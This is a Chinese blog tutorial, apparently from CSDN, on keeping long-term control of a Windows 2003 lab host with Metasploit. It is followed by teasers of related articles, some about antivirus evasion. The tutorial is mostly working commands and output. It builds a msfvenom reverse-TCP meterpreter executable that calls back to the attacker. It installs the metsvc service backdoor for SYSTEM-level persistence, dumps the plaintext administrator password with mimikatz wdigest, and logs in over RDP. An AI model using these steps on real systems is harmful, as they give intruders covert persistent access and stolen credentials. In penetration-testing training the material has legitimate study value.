利用Metasploit建立持续性会话后门

最新推荐文章于 2025-03-04 00:00:00 发布
最新推荐文章于 2025-03-04 00:00:00 发布
阅读量1.4w 收藏 37
点赞数 3
分类专栏: 技术分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/77957650
版权
本文介绍如何使用Metasploit生成并部署后门,实现对目标系统的长期控制。主要内容包括生成exe后门文件、配置监听参数、利用metsvc服务进行后门持久化,以及通过mimikatz插件读取系统明文密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 


环境
Kali 1.0 IP:192.168.0.7
windows 2003 IP:192.168.0.128

本次文章 讲解Metasploit维持会话 建立服务后门

首先先来生成一个 msf的exe后门

 

 

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test.exe //生成后门 msf > useexploit/multi/handler //使用模块 msf exploit(handler) > set lhostIP //设置kali的ip 不知道的可以ifconfig 查看一下 msf exploit(handler) > run //监听

大致的说下就行了
把后门拖到03主机 打开 上线后

shell 进入cmd

我们发现 这不是最高权限

接着我们 exit 退出

执行run metsvc -A

上传服务后门

 

meterpreter > run metsvc -A Creating a temporary installationdirectory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\VbqGppxISmg... >>Uploading metsrv.dll... >> Uploadingmetsvc-server.exe... >> Uploading metsvc.exe... Starting theservice... *Installing service metsvc Cannot create service (0x00000431) Trying to connect to the Meterpreterservice at 192.168.0.128:31337... meterpreter > Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800

我们会发现我们的msf后门已经掉线


接着我们启用另一个终端

 

msfconsole //打开msf

 

配置一下

msf > useexploit/multi/handler 
msf exploit(handler) > setpayload windows/metsvc_bind_tcp 
payload =>windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT31337
LPORT => 31337
msf exploit(handler) > set RHOST192.168.0.128

RHOST => 192.168.0.128

run //执行

成功上线


这里我们简单来说一下 

meterpreter >

Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800

set LPORT 31337 是端口地址 监听的


set RHOST 192.168.0.128 是03主机的ip地址



run 执行
shell
我们可以看到 现在是c盘的cmd最高权限

 

 

 

 

 

 

 

 

 

meterpreter > shell
Process 3612 created.
Channel 1 created.
Microsoft Windows [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2003Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>

 

然后我们在哪个建立服务后门的msf上
 

Ctrl+c暂停


回显到meterpreter >

接着我们exit 退出

sessions -l
我们会看到已经维持控制了一台主机 也就是我的03主机

 

msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 11 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINDOWS2003 192.168.0.7:54488 -> 192.168.0.128:31337 (192.168.0.128) msf exploit(handler) >

接着我们 sessions -i 11 就能控制 从而达到一个长期控制的效果

 

 

读取哈希值

对了 这里来说一下 Metasploit 有一款法国神器
加载 读取明文密码
load mimikatz //加载
wdigest //读取用户密码

 

加载后 我们来help查看一下帮助

 

 

Mimikatz命令
=================
 
     命令说明
     ------- -----------
     kerberos尝试检索Kerberos凭据
     livessp尝试检索livessp creds
     mimikatz_command运行自定义commannd
     msv尝试检索msv凭证(哈希值)
     ssp尝试检索ssp creds
     tspkg尝试检索tspkg凭据
     wdigest尝试检索wdigest凭据

读取明文密码

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;999     NTLM       WORKGROUP     WINDOWS2003$     
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;51357   NTLM                                      
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;199556  NTLM       WINDOWS2003   Administrator    admin

使用administrator admin 登录

 

root@xaiSec:~# rdesktop 192.168.0.128 -u administrator -p admin

一般的Metasploit后门 关闭进程的话 会掉线 不会达到长期控制的效果

利用metasploit生成免杀后门
mirror97black的博客
01-26 5711
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
内网渗透中metasploit与cs之间的会话转交
qq_53829555的博客
09-12 983
在内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了这里监听机为kali2021.4版,靶机为win10
metasploit---创建后门
孤的博客
11-22 845
后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
Metasploit(MSF) multi/handler 模块高级选项解析
最新发布
vortex5的博客
03-04 1217
命令来查看该模块的高级选项。高级选项用于调整监听器(Handler)的行为,以适应不同的渗透测试场景。例如,你可以控制是否在建立会话后退出监听、是否启用详细日志、是否启用多线程处理连接等。是 Metasploit 中一个非常重要的模块,主要用于监听目标机的连接。这样,如果在 5 分钟内没有新的会话建立,监听会自动关闭。有时候监听端口可能会冲突,可以手动指定。这样,如果连接失败,stager。在 Metasploit。如果网络不稳定,可以增加。这样,即使已经建立会话,,可以继续等待新的连接。
MSF后渗透持续后门
分享学习网络的点点滴滴
01-11 836
利用漏洞取得的meterpreter shell运行于内存中,重启失效○ 重复exploit漏洞可能造成服务崩溃○ 持久后门保证漏洞修复后仍可远程控制。
CS会话派生MSF会话
weixin_43047908的博客
08-16 1892
目录前言环境设置外部监听msf建立监听CS派生会话msf的shell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CS拿shell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
使用Metasploit搭建跳板——未更完
渗透测试
06-05 1123
文章目录前言一、添加路由项方法一:①功能介绍②具体过程方法二:①介绍功能②具体过程二、进行攻击总结 前言 本文简单介绍了使用metasploit搭建跳板进行攻击 一、添加路由项 添加路由项功能: 关于路由表,本人对metasploit使用添加路由项并没有深刻理解,仅供参考; 方法一: 使用run autoroute -p/-s ①功能介绍 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Examp
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2973
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
Metasploit持久性后门建立与维护
Metasploit持久性后门利用Metasploit框架创建的一种后门,可以在受害系统上实现长期控制和监视。 通过Metasploit持久性后门,攻击者可以在目标系统中执行各种操作,如文件操作、网络操作、系统操作等,而受害者并...
Metasploit可执行后门.doc
06-25
在文档"Metasploit可执行后门.doc"中,我们看到的是如何利用Metasploit创建持久性的后门并进行远程控制操作。 首先,`detach`命令在Meterpreter会话中被提及,它是用来断开会话连接的。当渗透测试者希望在目标系统...
Metasploit渗透测试之制作隐藏后门利用SQL注入进行渗透
## 解释隐藏后门的概念和重要性 隐藏后门是指在目标系统中植入的一种恶意程序,目的是为了在未来某个时间远程控制系统或者获取系统信息而不被察觉。在渗透测试中,制作隐藏后门是一种常见的手段,它能
Metasploit渗透测试实战:后门隐藏与文件免杀技术
通过Metasploit,渗透测试人员可以快速便捷地发现系统的漏洞,并利用相应的模块进行攻击。以下是Metasploit渗透测试简介的详细内容: ### 1.1 Metasploit框架概述 Metasploit框架由Rapid7公司维护,旨在帮助安全...
Metasploit 生成各种后门
热门推荐
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
msf生成免杀木马
qq_56426046的博客
09-08 6023
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
12.3、后渗透测试--持久化后门
无痕的博客
12-13 3264
metasploit后渗透测试--持久化后门
渗透测试-权限维持
Bnessy
05-15 575
所以,如果我们已经在目标系统的inetd配置文件中配置好,那么来自外部的某个socket是要执行一个可交互的shell,就获取了一个后门。msf监听,重启目标机器,spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件,下图演示了Meterpreter会话建立与Print Spooler服务(SYSTEM)相同级别的特权,并且已从System32文件夹执行了。使用chattr命令来防止root和其他管理用户删除和修改重要文件。
Metasploit 完全指南(四)
龙哥盟
07-18 1612
本章介绍了一种实用的基于客户端的利用方法。学习基于客户端的利用将使渗透测试人员更容易进行内部审计,或者在内部攻击比外部攻击更具影响力的情况下进行操作。在本章中,我们研究了各种技术,可以帮助我们攻击基于客户端的系统。我们研究了基于浏览器的利用及其变种。我们利用 Arduino 攻击了基于 Windows 的系统。我们学习了如何创建各种基于文件格式的利用,以及如何使用 Metasploit 进行 DNS 欺骗攻击。最后,我们还学习了如何利用 Android 设备。
limit active sessions
cuanjiong0688的博客
12-16 516
Normal 0 7.8 磅 0 2 false false false ...
Meterpreter 建立持久后门 backdoor
盗才生的博客
05-06 1万+
安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 609628 bytes long RunningPersistance Script Resource filefor cleanup created at /root/.msf4/logs/
Metasploit利用技巧:创建持久性后门与PHP执行payload
总结起来,这个文档涵盖了Metasploit在执行后门操作中的一些关键技术,包括使用不同类型的payload、管理Meterpreter会话、执行持久性操作以及利用漏洞进行payload注入。这些技能对于渗透测试人员和安全研究人员来说...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值